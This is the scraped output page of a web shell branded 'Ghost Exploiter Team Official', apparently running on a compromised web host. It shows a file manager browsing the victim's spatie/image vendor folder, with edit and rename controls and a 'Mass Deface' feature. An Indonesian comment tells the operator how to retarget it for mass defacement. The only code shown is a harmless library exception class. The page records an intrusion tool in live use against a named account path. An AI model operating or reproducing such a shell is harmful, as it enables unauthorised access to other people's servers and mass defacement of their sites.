webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
spatie
/
image
/
src
/
Exceptions
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
CouldNotConvert.php
0.277KB
edt
ren
InvalidImageDriver.php
0.252KB
edt
ren
InvalidManipulation.php
1.192KB
edt
ren
InvalidTemporaryDirecto
...
0.494KB
edt
ren
<?php namespace Spatie\Image\Exceptions; use Exception; class CouldNotConvert extends Exception { public static function unknownManipulation(string $operationName): self { return new self("Can not convert image. Unknown operation `{$operationName}` used"); } }